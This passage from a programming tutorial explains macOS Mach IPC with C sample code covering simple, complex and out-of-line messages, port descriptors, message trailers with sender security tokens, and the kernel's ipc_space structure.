    recv_msg.recv_content.header.msgh_size          = sizeof(recv_msg);
    recv_msg.recv_content.header.msgh_local_port    = replyPort;
    kr = mach_msg_receive(&recv_msg.recv_content.header);
    assert(kr == KERN_SUCCESS);
    printf("[sender] Got a Message\n");
    printf("[sender] Text: %s | number: %d\n", recv_msg.recv_content.texts, recv_msg.recv_content.integer);
}

void receiver()
{
    // Create a Mach port with a receive right
    mach_port_t port;
    kern_return_t kr = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port);
    assert(kr == KERN_SUCCESS);
    printf("[receiver] mach_port_allocate() created port right name %d\n", port);

    // Add a send right to the port as well
    kr = mach_port_insert_right(mach_task_self(), port, port, MACH_MSG_TYPE_MAKE_SEND);
    assert(kr == KERN_SUCCESS);
    printf("[receiver] mach_port_insert_right() inserted a send right\n");

    // Hand the port's send right to bootstrap so that other processes can look it up
    kr = bootstrap_register(bootstrap_port, "io.github.kiprey", port);
    assert(kr == KERN_SUCCESS);
    printf("[receiver] bootstrap_register()'ed our port\n");

    // Wait for a message
    struct mach_msg_receive_t recv_msg;
    recv_msg.recv_content.header.msgh_size          = sizeof(recv_msg);
    recv_msg.recv_content.header.msgh_local_port    = port;
    kr = mach_msg_receive(&recv_msg.recv_content.header);
    assert(kr == KERN_SUCCESS);
    printf("[receiver] Got a Message\n");
    printf("[receiver] Text: %s | number: %d | remote_port: %d\n", recv_msg.recv_content.texts, recv_msg.recv_content.integer, recv_msg.recv_content.header.msgh_remote_port);

    struct mach_msg_send_t send_msg;
    strcpy(send_msg.texts, "Hello, I'm receiver.");
    send_msg.integer = 2;

    // Reuse the received remote disposition, MACH_MSG_TYPE_PORT_SEND_ONCE (== MACH_MSG_TYPE_MOVE_SEND_ONCE)
    send_msg.header.msgh_bits           = recv_msg.recv_content.header.msgh_bits & MACH_MSGH_BITS_REMOTE_MASK;
    send_msg.header.msgh_remote_port    = recv_msg.recv_content.header.msgh_remote_port;
    send_msg.header.msgh_local_port     = MACH_PORT_NULL;
    send_msg.header.msgh_size           = sizeof(send_msg);

    // Send it
    mach_msg_return_t mr = mach_msg_send(&send_msg.header);
    assert(mr == KERN_SUCCESS);
    printf("[receiver] Message is sent.\n");
}

int main(int argc, const char *argv[])
{
    if (fork() == 0)
        sender();
    else
        receiver();
    return 0;
}

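Output:

You might wonder why the disposition for replyPort is MACH_MSG_TYPE_MAKE_SEND_ONCE. Could it be MACH_MSG_TYPE_COPY_SEND instead? It can, and in that case the receiver obtains a regular send right and can send Mach messages to replyPort multiple times instead of just once.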

b. complex message

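Remember the structure of a Mach message described earlier? A Mach message can carry simple data (as in the examples so far) as well as complex data (which is what comes next). We will now use a complex Mach message to transfer a Mach port for communication.

To keep things short, this part assumes the material above is fully understood.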

1) sender

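Now the sender needs to send its newly created replyPort (already allocated and given its rights) to the receiver. How?

The port descriptor can be passed directly in the message body. First, here is the type definition of the Mach message to send: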

typedef struct {
  mach_msg_header_t header;
  mach_msg_size_t msgh_descriptor_count;
  mach_msg_port_descriptor_t descriptor;
} mach_msg_complex_send_t;

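Here, header needs no explanation; msgh_descriptor_count says how many descriptors follow; and the descriptor field, of type mach_msg_port_descriptor_t, describes the port being transferred.

Descriptor sizes depend on the descriptor type: the generic descriptor and the port descriptor shown here occupy 12 bytes each, while an OOL descriptor occupies 16 bytes on 64-bit systems. The most basic descriptor type is declared as follows: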

typedef struct{
    natural_t                     pad1;
    mach_msg_size_t               pad2;
    unsigned int                  pad3 : 24;
    mach_msg_descriptor_type_t    type : 8;
} mach_msg_type_descriptor_t;

The port descriptor is defined as follows:

typedef struct{
  mach_port_t                   name;
  mach_msg_size_t               pad1;
  unsigned int                  pad2 : 16;
  mach_msg_type_name_t          disposition : 8;
  mach_msg_descriptor_type_t    type : 8;
} mach_msg_port_descriptor_t;

where

name: the port to transfer. Here it is set to replyPort.

disposition: the right to transfer for that port. Here it is set to MACH_MSG_TYPE_PORT_SEND.

The possible values are:

/*
 *  Values received/carried in messages.  Tells the receiver what
 *  sort of port right he now has.
 *
 *  MACH_MSG_TYPE_PORT_NAME is used to transfer a port name
 *  which should remain uninterpreted by the kernel.  (Port rights
 *  are not transferred, just the port name.)
 */

#define MACH_MSG_TYPE_PORT_NONE         0

#define MACH_MSG_TYPE_PORT_NAME         15
#define MACH_MSG_TYPE_PORT_RECEIVE      MACH_MSG_TYPE_MOVE_RECEIVE
#define MACH_MSG_TYPE_PORT_SEND         MACH_MSG_TYPE_MOVE_SEND
#define MACH_MSG_TYPE_PORT_SEND_ONCE    MACH_MSG_TYPE_MOVE_SEND_ONCE

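type: the descriptor type. Here it must be MACH_MSG_PORT_DESCRIPTOR.

Port descriptors are not the only kind of descriptor, so the type must be specified explicitly for the kernel to process it correctly. The available types are: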

#define MACH_MSG_PORT_DESCRIPTOR                0
#define MACH_MSG_OOL_DESCRIPTOR                 1
#define MACH_MSG_OOL_PORTS_DESCRIPTOR           2
#define MACH_MSG_OOL_VOLATILE_DESCRIPTOR        3
#define MACH_MSG_GUARDED_PORT_DESCRIPTOR        4
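As a quick sanity check on descriptor sizes, the sketch below mirrors the port descriptor and the 64-bit OOL descriptor with fixed-width types and lets the compiler verify their sizes. The demo_ types are hypothetical stand-ins for the definitions in <mach/message.h>, and the 4-byte packing is an assumption about how that header lays the structures out.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#pragma pack(push, 4)
/* Stand-in for mach_msg_port_descriptor_t (a mach_port_t is a 32-bit name). */
typedef struct {
    uint32_t     name;
    uint32_t     pad1;
    unsigned int pad2 : 16;
    unsigned int disposition : 8;
    unsigned int type : 8;
} demo_port_descriptor_t;

/* Stand-in for the LP64 layout of mach_msg_ool_descriptor_t. */
typedef struct {
    uint64_t     address;       /* void * on a 64-bit system */
    unsigned int deallocate : 8;
    unsigned int copy : 8;
    unsigned int pad1 : 8;
    unsigned int type : 8;
    uint32_t     size;
} demo_ool_descriptor_t;
#pragma pack(pop)

/* Checked at compile time: 12 bytes for a port descriptor, 16 for OOL. */
static_assert(sizeof(demo_port_descriptor_t) == 12, "port descriptor size");
static_assert(sizeof(demo_ool_descriptor_t) == 16, "OOL descriptor size");

size_t demo_port_descriptor_size(void) { return sizeof(demo_port_descriptor_t); }
size_t demo_ool_descriptor_size(void)  { return sizeof(demo_ool_descriptor_t); }
```

In both layouts the type bit-field is the last 8 bits of a 32-bit word that also holds padding and flags, which is what lets the kernel tell the descriptor kinds apart before interpreting the rest.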

Code example:

send_msg.msgh_descriptor_count      = 1;
send_msg.descriptor.name            = replyPort;
send_msg.descriptor.disposition     = MACH_MSG_TYPE_PORT_SEND;
send_msg.descriptor.type            = MACH_MSG_PORT_DESCRIPTOR;

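Finally, before calling mach_msg_send, remember to add MACH_MSGH_BITS_COMPLEX to the msgh_bits field to mark the message as complex. Otherwise the descriptors are interpreted as plain inline data.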

// Note: the message must be marked as complex
send_msg.header.msgh_bits = MACH_MSGH_BITS_SET(MACH_MSG_TYPE_COPY_SEND, 0, 0, MACH_MSGH_BITS_COMPLEX);
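The effect of the fourth argument can be sketched as follows. The masks are assumed to match <mach/message.h>, and the DEMO_ and demo_ names are hypothetical, used only so the snippet builds anywhere.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

#define DEMO_BITS_PORTS_MASK 0x001f1f1fu /* remote | local | voucher fields */
#define DEMO_BITS_COMPLEX    0x80000000u /* MACH_MSGH_BITS_COMPLEX */
#define DEMO_COPY_SEND       19u         /* MACH_MSG_TYPE_COPY_SEND */

/* Mirrors MACH_MSGH_BITS_SET(remote, local, voucher, other): the three
 * dispositions go into their 5-bit fields, and "other" supplies flag bits
 * outside those fields, such as the complex bit. */
uint32_t demo_msgh_bits_set(uint32_t remote, uint32_t local,
                            uint32_t voucher, uint32_t other) {
    assert(remote <= 0x1f && local <= 0x1f && voucher <= 0x1f);
    return remote | (local << 8) | (voucher << 16) |
           (other & ~DEMO_BITS_PORTS_MASK);
}

/* True when the header says that descriptors follow it. */
bool demo_is_complex(uint32_t bits) {
    return (bits & DEMO_BITS_COMPLEX) != 0;
}
```

For the header above, demo_msgh_bits_set(DEMO_COPY_SEND, 0, 0, DEMO_BITS_COMPLEX) gives 0x80000013; without the top bit the kernel would treat the descriptor bytes as ordinary inline payload.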

2) receiver

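The receiver only has to receive the message and take the port name out of the port descriptor; it can then start communicating.

There is not much to do:

// Wait for a message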
mach_msg_complex_receive_t recv_msg;
recv_msg.recv_content.header.msgh_size          = sizeof(recv_msg);
recv_msg.recv_content.header.msgh_local_port    = port;
kr = mach_msg_receive(&recv_msg.recv_content.header);

mach_msg_simple_send_t send_msg;
strcpy(send_msg.texts, "Hello, I'm receiver.");
send_msg.integer = 2;

send_msg.header.msgh_bits           = recv_msg.recv_content.descriptor.disposition;
send_msg.header.msgh_remote_port    = recv_msg.recv_content.descriptor.name;
send_msg.header.msgh_local_port     = MACH_PORT_NULL;
send_msg.header.msgh_size           = sizeof(send_msg);

// Send it
mach_msg_return_t mr = mach_msg_send(&send_msg.header);

3) Code example

The sample code:

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <assert.h>
#include <mach/mach.h>
#include <servers/bootstrap.h>

typedef struct {
    mach_msg_header_t header;
    char texts[0x20];
    int integer;
} mach_msg_simple_send_t;

typedef struct {
    mach_msg_simple_send_t recv_content;
    mach_msg_trailer_t trailer;
} mach_msg_simple_receive_t;

typedef struct {
  mach_msg_header_t header;
  mach_msg_size_t msgh_descriptor_count;
  mach_msg_port_descriptor_t descriptor;
} mach_msg_complex_send_t;

typedef struct {
    mach_msg_complex_send_t recv_content;
    mach_msg_trailer_t trailer;
} mach_msg_complex_receive_t;

void sender()
{
    // Wait briefly so the receiver can register with bootstrap
    usleep(100);
    // Look up the receiver's Mach port through bootstrap
    mach_port_t port;
    kern_return_t kr = bootstrap_look_up(bootstrap_port, "io.github.kiprey", &port);
    assert(kr == KERN_SUCCESS);
    printf("[sender] bootstrap_look_up() returned port right name %d\n", port);

    // Build the message to send
    mach_msg_complex_send_t send_msg;

    // Create a new replyPort for the receiver to reply to
    mach_port_t replyPort;
    kr = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &replyPort);
    assert(kr == KERN_SUCCESS);
    printf("[sender] mach_port_allocate() created port right name %d\n", replyPort);

    // Add a send right to the port as well
    kr = mach_port_insert_right(mach_task_self(), replyPort, replyPort, MACH_MSG_TYPE_MAKE_SEND);
    assert(kr == KERN_SUCCESS);
    printf("[sender] mach_port_insert_right() inserted a send right\n");

    // Note: the message must be marked as complex
    send_msg.header.msgh_bits           = MACH_MSGH_BITS_SET(MACH_MSG_TYPE_COPY_SEND, 0, 0, MACH_MSGH_BITS_COMPLEX);
    send_msg.header.msgh_remote_port    = port;
    send_msg.header.msgh_local_port     = MACH_PORT_NULL;
    send_msg.header.msgh_size           = sizeof(send_msg);
    // Exactly one descriptor is transferred
    send_msg.msgh_descriptor_count      = 1;
    send_msg.descriptor.name            = replyPort;
    send_msg.descriptor.disposition     = MACH_MSG_TYPE_PORT_SEND;
    send_msg.descriptor.type            = MACH_MSG_PORT_DESCRIPTOR;

    // Send it
    mach_msg_return_t mr = mach_msg_send(&send_msg.header);
    assert(mr == KERN_SUCCESS);
    printf("[sender] Message is sent.\n");

    // Wait for the reply
    mach_msg_simple_receive_t recv_msg;
    recv_msg.recv_content.header.msgh_size          = sizeof(recv_msg);
    recv_msg.recv_content.header.msgh_local_port    = replyPort;
    kr = mach_msg_receive(&recv_msg.recv_content.header);
    assert(kr == KERN_SUCCESS);
    printf("[sender] Got a Message\n");
    printf("[sender] Text: %s | number: %d\n", recv_msg.recv_content.texts, recv_msg.recv_content.integer);
}

void receiver()
{
    // Create a Mach port with a receive right
    mach_port_t port;
    kern_return_t kr = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port);
    assert(kr == KERN_SUCCESS);
    printf("[receiver] mach_port_allocate() created port right name %d\n", port);

    // Add a send right to the port as well
    kr = mach_port_insert_right(mach_task_self(), port, port, MACH_MSG_TYPE_MAKE_SEND);
    assert(kr == KERN_SUCCESS);
    printf("[receiver] mach_port_insert_right() inserted a send right\n");

    // Hand the port's send right to bootstrap so that other processes can look it up
    kr = bootstrap_register(bootstrap_port, "io.github.kiprey", port);
    assert(kr == KERN_SUCCESS);
    printf("[receiver] bootstrap_register()'ed our port\n");

    // Wait for a message
    mach_msg_complex_receive_t recv_msg;
    recv_msg.recv_content.header.msgh_size          = sizeof(recv_msg);
    recv_msg.recv_content.header.msgh_local_port    = port;
    kr = mach_msg_receive(&recv_msg.recv_content.header);
    assert(kr == KERN_SUCCESS);
    assert(recv_msg.recv_content.msgh_descriptor_count == 1);
    printf("[receiver] Got a Message\n");
    printf("[receiver] remote_port: %d\n", recv_msg.recv_content.descriptor.name);

    mach_msg_simple_send_t send_msg;
    strcpy(send_msg.texts, "Hello, I'm receiver.");
    send_msg.integer = 2;

    // The received disposition is MACH_MSG_TYPE_PORT_SEND (== MACH_MSG_TYPE_MOVE_SEND), so the reply consumes the send right
    send_msg.header.msgh_bits           = recv_msg.recv_content.descriptor.disposition;
    send_msg.header.msgh_remote_port    = recv_msg.recv_content.descriptor.name;
    send_msg.header.msgh_local_port     = MACH_PORT_NULL;
    send_msg.header.msgh_size           = sizeof(send_msg);

    // Send it
    mach_msg_return_t mr = mach_msg_send(&send_msg.header);
    assert(mr == KERN_SUCCESS);
    printf("[receiver] Message is sent.\n");
}

int main(int argc, const char *argv[])
{
    fork() ? sender() : receiver();
    return 0;
}

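Output:

3. Mach OOL communication

When a process needs to pass a large amount of data to its peer, the inline data of a simple message no longer meets our needs (copying the data into the inline payload is quite expensive). Instead, we can use the OOL descriptor of a Mach complex message to transfer memory pages.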

a. sender

First, define the structure of the complex Mach message:

typedef struct
{
    mach_msg_header_t header;
    mach_msg_size_t msgh_descriptor_count;
    mach_msg_ool_descriptor_t descriptor;
} mach_msg_complex_send_t;

Note that the descriptor in the message body has type mach_msg_ool_descriptor_t, which is defined as follows:

typedef struct{
    void*                         address;
#if !defined(__LP64__)
    mach_msg_size_t               size;
#endif
    boolean_t                     deallocate: 8;
    mach_msg_copy_options_t       copy: 8;
    unsigned int                  pad1: 8;
    mach_msg_descriptor_type_t    type: 8;
#if defined(__LP64__)
    mach_msg_size_t               size;
#endif
} mach_msg_ool_descriptor_t;

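where

address: the base address of the memory pages to send.
size: the length of the memory to send.
deallocate: whether the sent pages are implicitly released from the sender after sending (as if vm_deallocate were called automatically); usually false.
Setting this field turns a memory copy into a memory move: the sender's pages are moved into the receiver's address space, which is more efficient.
copy: how the kernel copies the pages being sent. There are two options:
- MACH_MSG_VIRTUAL_COPY: lets the kernel choose any mechanism to transfer the data. Typically the kernel copies the virtual mapping and shares the physical pages, copying the data only when a write actually happens, i.e. copy-on-write.
- MACH_MSG_PHYSICAL_COPY: the kernel actually copies the data into new physical pages.
type: the type of this descriptor; here it must be MACH_MSG_OOL_DESCRIPTOR.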

Next, the sender creates a virtual memory page and writes some data into it:

char *buf = NULL;
vm_size_t len = vm_page_size;
// The fourth argument of vm_allocate is a flags value, not a protection mask
if (vm_allocate(mach_task_self(), (vm_address_t *)&buf, len,
                VM_FLAGS_ANYWHERE) != KERN_SUCCESS)
    abort();
strcpy(buf, "This is a buf message from sender.");

Then set up the message and send it:

// Note: the message must be marked as complex
send_msg.header.msgh_bits = MACH_MSGH_BITS_SET(MACH_MSG_TYPE_COPY_SEND, 0, 0, MACH_MSGH_BITS_COMPLEX);
send_msg.header.msgh_remote_port = port;
send_msg.header.msgh_local_port = MACH_PORT_NULL;
send_msg.header.msgh_size = sizeof(send_msg);

// Fill in the OOL descriptor
send_msg.msgh_descriptor_count = 1;
send_msg.descriptor.address = buf;
send_msg.descriptor.copy = MACH_MSG_VIRTUAL_COPY;
send_msg.descriptor.deallocate = false;
send_msg.descriptor.size = len;
send_msg.descriptor.type = MACH_MSG_OOL_DESCRIPTOR;

b. receiver

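When the receiver receives this Mach message, the kernel allocates a new region of memory in the receiver's address space to hold the received data.

There used to be an option (MACH_MSG_OVERWRITE) that told the kernel to write the received data over a memory address specified by the receiver, but that option has been deprecated.

c. Code example

A simple example follows, in which the receiver uses the MACH_MSG_ALLOCATE mode to receive the data: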

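#include <stdio.h>
#include <stdlib.h>
#include <stdbool.h>
#include <string.h>
#include <unistd.h>
#include <assert.h>
#include <mach/mach.h>
#include <servers/bootstrap.h>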

typedef struct
{
    mach_msg_header_t header;
    mach_msg_size_t msgh_descriptor_count;
    mach_msg_ool_descriptor_t descriptor;
} mach_msg_complex_send_t;

typedef struct
{
    mach_msg_complex_send_t recv_content;
    mach_msg_trailer_t trailer;
} mach_msg_complex_receive_t;

void sender()
{
    // Wait briefly so the receiver can register with bootstrap
    usleep(1000);
    // Look up the receiver's Mach port through bootstrap
    mach_port_t port;
    if (bootstrap_look_up(bootstrap_port, "io.github.kiprey", &port) != KERN_SUCCESS)
        abort();
    printf("[sender] bootstrap_look_up() returned port right name %d\n", port);

    // Build the message to send
    mach_msg_complex_send_t send_msg;

    // Note: the message must be marked as complex
    send_msg.header.msgh_bits = MACH_MSGH_BITS_SET(MACH_MSG_TYPE_COPY_SEND, 0, 0, MACH_MSGH_BITS_COMPLEX);
    send_msg.header.msgh_remote_port = port;
    send_msg.header.msgh_local_port = MACH_PORT_NULL;
    send_msg.header.msgh_size = sizeof(send_msg);
    // Allocate the buffer to transfer (the fourth argument of vm_allocate is a flags value)
    char *buf = NULL;
    vm_size_t len = vm_page_size;
    if (vm_allocate(mach_task_self(), (vm_address_t *)&buf, len,
                    VM_FLAGS_ANYWHERE) != KERN_SUCCESS)
        abort();
    strcpy(buf, "This is a buf message from sender.");

    send_msg.msgh_descriptor_count = 1;
    send_msg.descriptor.address = buf;
    send_msg.descriptor.copy = MACH_MSG_VIRTUAL_COPY;
    send_msg.descriptor.deallocate = false;
    send_msg.descriptor.size = len;
    send_msg.descriptor.type = MACH_MSG_OOL_DESCRIPTOR;

    // Send it
    if (mach_msg_send(&send_msg.header) != KERN_SUCCESS)
        abort();
    printf("[sender] Message is sent, buf address: %p\n", (void *)buf);
}

void receiver()
{
    // Create a Mach port with a receive right
    mach_port_t port;
    if (mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port) != KERN_SUCCESS)
        abort();
    printf("[receiver] mach_port_allocate() created port right name %d\n", port);

    // Add a send right to the port as well
    if (mach_port_insert_right(mach_task_self(), port, port, MACH_MSG_TYPE_MAKE_SEND) != KERN_SUCCESS)
        abort();
    printf("[receiver] mach_port_insert_right() inserted a send right\n");

    // Hand the port's send right to bootstrap so that other processes can look it up
    if (bootstrap_register(bootstrap_port, "io.github.kiprey", port) != KERN_SUCCESS)
        abort();
    printf("[receiver] bootstrap_register()'ed our port\n");

    // Wait for a message
    mach_msg_complex_receive_t recv_msg;
    recv_msg.recv_content.header.msgh_size = sizeof(recv_msg);
    recv_msg.recv_content.header.msgh_local_port = port;
    if (mach_msg_receive(&recv_msg.recv_content.header) != KERN_SUCCESS)
        abort();
    assert(recv_msg.recv_content.msgh_descriptor_count == 1);

    char *buf = recv_msg.recv_content.descriptor.address;
    size_t len = recv_msg.recv_content.descriptor.size;
    printf("[receiver] Got a Message\n");
    printf("[receiver] recv buf address: %p, len: %zu, content: %s\n", (void *)buf, len, buf);
}

int main(int argc, const char *argv[])
{
    fork() ? sender() : receiver();
    return 0;
}

Output:

4. Message Trailer

A Mach message received by the receiver includes a trailer structure.

typedef struct
{
    mach_msg_header_t header;
    char texts[0x20];
    int integer;
} mach_msg_send_t;

typedef struct
{
    mach_msg_send_t recv_content;
    mach_msg_trailer_t trailer;
} mach_msg_receive_t;

The mach_msg_trailer_t structure has the following fields:

typedef struct{
    mach_msg_trailer_type_t       msgh_trailer_type;
    mach_msg_trailer_size_t       msgh_trailer_size;
} mach_msg_trailer_t;

The first field is the trailer type; the second is the size of the trailer in bytes.

As for trailer types, Mac OS X currently exposes only one format to user space, MACH_MSG_TRAILER_FORMAT_0:

typedef unsigned int mach_msg_trailer_type_t;

#define MACH_MSG_TRAILER_FORMAT_0       0

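Within this format, however, there are several trailer structures:

mach_msg_trailer_t: an empty trailer containing only the type and size fields.

mach_msg_seqno_trailer_t: extends the layout of the first structure with a third field: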

typedef natural_t mach_port_seqno_t;            /* sequence number */

mach_port_seqno_t             msgh_seqno;

This is the sequence number of the message.

mach_msg_security_trailer_t: extends the second structure with a fourth field:

typedef struct{
 unsigned int                  val[2];
} security_token_t;

security_token_t              msgh_sender;

The two integers of the security token are the sender's UID and GID.

mach_msg_audit_trailer_t: extends the third structure with a fifth field:

/*
 * The audit token is an opaque token which identifies
 * Mach tasks and senders of Mach messages as subjects
 * to the BSM audit system.  Only the appropriate BSM
 * library routines should be used to interpret the
 * contents of the audit token as the representation
 * of the subject identity within the token may change
 * over time.
 */
typedef struct{
 unsigned int                  val[8];
} audit_token_t;

audit_token_t                 msgh_audit;

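The audit token holds 8 integers and must be interpreted with dedicated library routines.

mach_msg_context_trailer_t: extends the fourth structure with a sixth field.
mach_msg_mac_trailer_t: extends the fifth structure with the seventh and eighth fields.
mach_msg_max_trailer_t: the largest trailer; in current headers it is a typedef for mach_msg_mac_trailer_t.

As you can see, each trailer is always nested at the start of the next one, which helps compatibility.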
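The nesting can be checked with a small layout sketch. The demo_ structures below are hypothetical mirrors of the first four trailer types, built from fixed-width integers on the assumption that natural_t and the trailer type and size fields are all 32 bits wide.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

typedef struct { uint32_t val[2]; } demo_security_token_t;
typedef struct { uint32_t val[8]; } demo_audit_token_t;

typedef struct {
    uint32_t msgh_trailer_type;
    uint32_t msgh_trailer_size;
} demo_trailer_t;

typedef struct {
    uint32_t msgh_trailer_type;
    uint32_t msgh_trailer_size;
    uint32_t msgh_seqno;
} demo_seqno_trailer_t;

typedef struct {
    uint32_t msgh_trailer_type;
    uint32_t msgh_trailer_size;
    uint32_t msgh_seqno;
    demo_security_token_t msgh_sender;
} demo_security_trailer_t;

typedef struct {
    uint32_t msgh_trailer_type;
    uint32_t msgh_trailer_size;
    uint32_t msgh_seqno;
    demo_security_token_t msgh_sender;
    demo_audit_token_t msgh_audit;
} demo_audit_trailer_t;

/* A shared field sits at the same offset in every trailer that has it. */
static_assert(offsetof(demo_security_trailer_t, msgh_sender) ==
              offsetof(demo_audit_trailer_t, msgh_sender), "nested prefix");

/* Size in bytes of the trailer that ends at the given element index
 * (0 = empty trailer, 1 = seqno, 2 = sender, 3 = audit); 0 if unknown. */
size_t demo_trailer_size(int last_element) {
    switch (last_element) {
    case 0: return sizeof(demo_trailer_t);
    case 1: return sizeof(demo_seqno_trailer_t);
    case 2: return sizeof(demo_security_trailer_t);
    case 3: return sizeof(demo_audit_trailer_t);
    default: return 0;
    }
}
```

Because each structure is a prefix of the next, code that only understands the smaller trailer can still read its fields from a larger one.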

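To receive one of the larger trailers, the receiver must explicitly set the option argument of mach_msg to state that the trailer format is FORMAT_0 and to name the last trailer field it wants to receive. Consider this example:

// Wait for a message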
mach_msg_receive_t message;
mach_msg_option_t option = MACH_RCV_MSG 
    | MACH_RCV_TRAILER_TYPE(MACH_MSG_TRAILER_FORMAT_0) 
    | MACH_RCV_TRAILER_ELEMENTS(MACH_RCV_TRAILER_SENDER);
kr = mach_msg(&message.recv_content.header, option,
              0, sizeof(message), port,
              MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);

In this example, option includes MACH_RCV_TRAILER_ELEMENTS(MACH_RCV_TRAILER_SENDER), which requests a trailer of type mach_msg_security_trailer_t, because the last field of that type is the sender token.

#define MACH_RCV_TRAILER_NULL   0 // mach_msg_trailer_t 
#define MACH_RCV_TRAILER_SEQNO  1 // mach_msg_seqno_trailer_t 
#define MACH_RCV_TRAILER_SENDER 2 // mach_msg_security_trailer_t 
#define MACH_RCV_TRAILER_AUDIT  3 // mach_msg_audit_trailer_t
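How these small constants end up inside the option word can be sketched as follows. The shift amounts and the MACH_RCV_MSG value are assumed to match <mach/message.h>; the DEMO_ and demo_ names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

#define DEMO_RCV_MSG            0x00000002u /* MACH_RCV_MSG */
#define DEMO_TRAILER_FORMAT_0   0u          /* MACH_MSG_TRAILER_FORMAT_0 */
#define DEMO_RCV_TRAILER_SENDER 2u          /* MACH_RCV_TRAILER_SENDER */

/* Mirrors MACH_RCV_TRAILER_TYPE(x): the format goes into bits 28..31. */
uint32_t demo_rcv_trailer_type(uint32_t format) {
    return (format & 0xfu) << 28;
}

/* Mirrors MACH_RCV_TRAILER_ELEMENTS(x): the last wanted element goes
 * into bits 24..27. */
uint32_t demo_rcv_trailer_elements(uint32_t last_element) {
    return (last_element & 0xfu) << 24;
}

/* Builds the receive option used in the example above. */
uint32_t demo_receive_option(uint32_t last_element) {
    assert(last_element <= 0xfu);
    return DEMO_RCV_MSG |
           demo_rcv_trailer_type(DEMO_TRAILER_FORMAT_0) |
           demo_rcv_trailer_elements(last_element);
}

/* Mirrors GET_RCV_ELEMENTS(option): recovers the requested element index. */
uint32_t demo_get_rcv_elements(uint32_t option) {
    return (option >> 24) & 0xfu;
}
```

For MACH_RCV_TRAILER_SENDER this produces 0x02000002, so the requested trailer elements travel in the same word as the MACH_RCV_MSG flag.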

A simple test:

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <assert.h>
#include <mach/mach.h>
#include <servers/bootstrap.h>

typedef struct
{
    mach_msg_header_t header;
    char texts[0x20];
    int integer;
} mach_msg_send_t;

typedef struct
{
    mach_msg_send_t recv_content;
    mach_msg_security_trailer_t trailer;
} mach_msg_receive_t;

void sender() {
    printf("[sender] Current UID(%d) GID(%d)\n", getuid(), getgid());
    usleep(1000);
    // Look up the receiver's Mach port through bootstrap
    mach_port_t port;
    kern_return_t kr = bootstrap_look_up(bootstrap_port, "io.github.kiprey", &port);
    assert(kr == KERN_SUCCESS);
    printf("[sender] bootstrap_look_up() returned port right name %d\n", port);

    // Build the message to send
    mach_msg_send_t message;

    message.header.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, 0);
    message.header.msgh_remote_port = port;
    message.header.msgh_local_port = MACH_PORT_NULL;
    message.header.msgh_size = sizeof(message);

    strcpy(message.texts, "Hello, I'm sender");
    message.integer = 123;

    // Send it
    mach_msg_return_t mr = mach_msg_send(&message.header);
    assert(mr == KERN_SUCCESS);
    printf("[sender] Message is sent.\n");
}

void receiver() {
    // Create a Mach port with a receive right
    mach_port_t port;
    kern_return_t kr = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port);
    assert(kr == KERN_SUCCESS);
    printf("[receiver] mach_port_allocate() created port right name %d\n", port);
    
    // Add a send right to the port as well
    kr = mach_port_insert_right(mach_task_self(), port, port, MACH_MSG_TYPE_MAKE_SEND);
    assert (kr == KERN_SUCCESS);
    printf("[receiver] mach_port_insert_right() inserted a send right\n");

    // Hand the port's send right to bootstrap so that other processes can look it up
    kr = bootstrap_register(bootstrap_port, "io.github.kiprey", port);
    assert (kr == KERN_SUCCESS);
    printf("[receiver] bootstrap_register()'ed our port\n");

    // Wait for a message
    mach_msg_receive_t message;
    mach_msg_option_t option = MACH_RCV_MSG 
                            | MACH_RCV_TRAILER_TYPE(MACH_MSG_TRAILER_FORMAT_0) 
                            | MACH_RCV_TRAILER_ELEMENTS(MACH_RCV_TRAILER_SENDER);
    kr = mach_msg(&message.recv_content.header, option,
            0, sizeof(message), port,
            MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);

    assert (kr == KERN_SUCCESS);
    printf("[receiver] Got a message\n");

    printf("[receiver] Text: %s, number: %d\n", message.recv_content.texts, message.recv_content.integer);
    printf("[receiver] Security token = UID(%u) GID(%u)\n", 
           message.trailer.msgh_sender.val[0],  // sender's user ID 
           message.trailer.msgh_sender.val[1]); // sender's group ID
}

int main(int argc, const char * argv[]) {
    fork() ? sender() : receiver();
    return 0;
}

Output:

VI. Selected Kernel Types

1. ipc_space

The task structure contains a field struct ipc_space *itk_space, which holds the IPC state used by the task. The structure is defined as follows:

struct ipc_space {
    lck_spin_t    is_lock_data;
    ipc_space_refs_t is_bits;    /* holds refs, active, growing */
    ipc_entry_num_t is_table_size;    /* current size of table */
    ipc_entry_num_t is_table_free;    /* count of free elements */
    ipc_entry_t is_table;        /* an array of entries */
    task_t is_task;                 /* associated task */
    struct ipc_table_size *is_table_next; /* info for larger table */
    ipc_entry_num_t is_low_mod;    /* lowest modified entry during growth */
    ipc_entry_num_t is_high_mod;    /* highest modified entry during growth */
    struct bool_gen bool_gen;       /* state for boolean RNG */
    unsigned int is_entropy[IS_ENTROPY_CNT]; /* pool of entropy taken from RNG */
    int is_node_id;            /* HOST_LOCAL_NODE, or remote node if proxy space */
};

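The is_table field points to an array of struct ipc_entry with is_table_size elements; a Mach port name used in user space (an integer) maps to one of these kernel structures. is_table is populated with some initial entries when it is created.

The is_bits field carries control information such as the reference count, whether the ipc_space is active, and whether it is currently growing. The growing bit is a simple flag that guards against races. When the kernel uses an ipc_space and finds is_table too small, it tries to grow it; if a kernel thread finds that another kernel thread is already growing the ipc_space, it sleeps (is_write_sleep) until that thread finishes and then continues.

When the receive right of a Mach port is released, the port itself is considered released. If the number of references to the port is then 0, the corresponding ipc_entry in is_table is moved to is_table_free, and all rights to the released Mach port become MACH_PORT_RIGHT_DEAD_NAME, meaning that those rights are dead.

This mechanism prevents the port name from being reused too early.

When the ipc_space needs a new ipc_entry, it first tries to take the earliest-released ipc_entry from is_table_free (that is, is_table_free is FIFO) and reuse it; if is_table_free is empty, it tries to grow the ipc_space and inserts a new ipc_entry.

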